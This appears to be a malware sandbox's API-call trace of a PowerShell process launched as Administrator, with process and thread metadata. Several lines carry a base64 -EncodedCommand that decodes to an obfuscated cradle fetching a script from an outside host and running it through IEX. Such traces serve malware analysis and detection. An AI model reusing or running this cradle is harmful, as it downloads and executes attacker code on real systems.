	[0778.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.368] SetErrorMode (uMode=0x1) returned 0x1
	[0778.368] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.368] SetErrorMode (uMode=0x1) returned 0x1
	[0778.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.382] SetErrorMode (uMode=0x1) returned 0x1
	[0778.382] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.383] SetErrorMode (uMode=0x1) returned 0x1
	[0778.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.383] SetErrorMode (uMode=0x1) returned 0x1
	[0778.383] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.383] SetErrorMode (uMode=0x1) returned 0x1
	[0778.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.384] SetErrorMode (uMode=0x1) returned 0x1
	[0778.384] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.384] SetErrorMode (uMode=0x1) returned 0x1
	[0778.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.384] SetErrorMode (uMode=0x1) returned 0x1
	[0778.385] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.385] SetErrorMode (uMode=0x1) returned 0x1
	[0778.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.385] SetErrorMode (uMode=0x1) returned 0x1
	[0778.385] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.386] SetErrorMode (uMode=0x1) returned 0x1
	[0778.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.386] SetErrorMode (uMode=0x1) returned 0x1
	[0778.386] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.386] SetErrorMode (uMode=0x1) returned 0x1
	[0778.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0778.387] SetErrorMode (uMode=0x1) returned 0x1
	[0778.387] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.387] SetErrorMode (uMode=0x1) returned 0x1
	[0778.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0778.387] SetErrorMode (uMode=0x1) returned 0x1
	[0778.387] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.388] SetErrorMode (uMode=0x1) returned 0x1
	[0778.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0778.388] SetErrorMode (uMode=0x1) returned 0x1
	[0778.388] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.388] SetErrorMode (uMode=0x1) returned 0x1
	[0778.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0778.389] SetErrorMode (uMode=0x1) returned 0x1
	[0778.389] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.389] SetErrorMode (uMode=0x1) returned 0x1
	[0778.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0778.389] SetErrorMode (uMode=0x1) returned 0x1
	[0778.389] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0778.390] SetErrorMode (uMode=0x1) returned 0x1
	[0778.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8dd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0778.390] SetErrorMode (uMode=0x1) returned 0x1
	[0778.390] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8dd940 | out: lpFindFileData=0x1c8dd940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b9716b0
	[0778.391] FindNextFileW (in: hFindFile=0x1b9716b0, lpFindFileData=0x1c8dd950 | out: lpFindFileData=0x1c8dd950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0778.391] FindClose (in: hFindFile=0x1b9716b0 | out: hFindFile=0x1b9716b0) returned 1
	[0778.392] SetErrorMode (uMode=0x1) returned 0x1
	[0778.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8dda60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0778.393] SetErrorMode (uMode=0x1) returned 0x1
	[0778.393] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8ddc70 | out: lpFileInformation=0x1c8ddc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0778.393] SetErrorMode (uMode=0x1) returned 0x1
	[0778.394] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0778.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.394] CoTaskMemFree (pv=0x2434b0) 
	[0778.397] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0778.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.398] CoTaskMemFree (pv=0x2434b0) 
	[0778.401] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0778.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.402] CoTaskMemFree (pv=0x2434b0) 
	[0779.219] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0779.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.219] CoTaskMemFree (pv=0x2434b0) 
	[0779.234] CoTaskMemAlloc (cb=0x3b) returned 0x26a2a0
	[0779.235] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8dde58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8dde58) returned 0x4550
	[0779.236] CoTaskMemFree (pv=0x26a2a0) 
	[0779.244] GetConsoleWindow () returned 0x10622
	[0779.252] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0779.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0779.252] CoTaskMemFree (pv=0x2434b0) 
	[0779.367] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0779.367] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0779.367] CoTaskMemFree (pv=0x2434b0) 
	[0779.373] CoTaskMemAlloc (cb=0x104) returned 0x2434b0
	[0779.373] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2434b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0779.373] CoTaskMemFree (pv=0x2434b0) 
	[0779.376] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c8ddea0 | out: pNumArgs=0x1c8ddea0) returned 0x1b995bc0*=""
	[0779.377] lstrlenW (lpString="-EncodedCommand") returned 15
	[0779.378] CoTaskMemAlloc (cb=0x22) returned 0x1b9d1eb0
	[0779.378] RtlMoveMemory (in: Destination=0x1b9d1eb0, Source=0x1b995be2, Length=0x20 | out: Destination=0x1b9d1eb0) 
	[0779.378] CoTaskMemFree (pv=0x1b9d1eb0) 
	[0779.378] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0779.378] CoTaskMemAlloc (cb=0x2f4) returned 0x1b9dfcc0
	[0779.378] RtlMoveMemory (in: Destination=0x1b9dfcc0, Source=0x1b995c02, Length=0x2f2 | out: Destination=0x1b9dfcc0) 
	[0779.378] CoTaskMemFree (pv=0x1b9dfcc0) 
	[0782.937] LocalFree (hMem=0x1b995bc0) returned 0x0
	[0782.937] CoTaskMemAlloc (cb=0x804) returned 0x1b9d88a0
	[0782.937] GetConsoleTitleW (in: lpConsoleTitle=0x1b9d88a0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0782.938] CoTaskMemFree (pv=0x1b9d88a0) 
	[0782.947] CoTaskMemAlloc (cb=0x38e) returned 0x1b995bc0
	[0782.948] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c8dde00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30779a0 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x30779a0*(hProcess=0x39c, hThread=0x350, dwProcessId=0x22dc, dwThreadId=0x22e0)) returned 1
	[0783.289] CoTaskMemFree (pv=0x1b995bc0) 
	[0783.290] CloseHandle (hObject=0x350) returned 1
	[0783.290] CoTaskMemAlloc (cb=0x3b) returned 0x26a2a0
	[0783.290] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c8ddea8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ddea8) returned 0x4550
	[0783.291] CoTaskMemFree (pv=0x26a2a0) 
	[0783.294] GetCurrentProcess () returned 0xffffffffffffffff
	[0783.294] GetCurrentProcess () returned 0xffffffffffffffff
	[0783.295] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8ddf88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8ddf88*=0x350) returned 1

Process:
	id = "124"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x60a9f000"
	os_pid = "0x12c4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 623
	os_tid = 0x12ac

	[0435.191] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0812.727] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0818.323] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0818.324] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0818.324] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0818.324] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0843.575] GetVersionExW (in: lpVersionInformation=0x1eda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1eda40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0843.577] GetVersionExW (in: lpVersionInformation=0x1eda40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1eda40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0843.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0843.592] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0843.593] GetVersionExW (in: lpVersionInformation=0x1ed7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ed7b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0843.593] SetErrorMode (uMode=0x1) returned 0x1
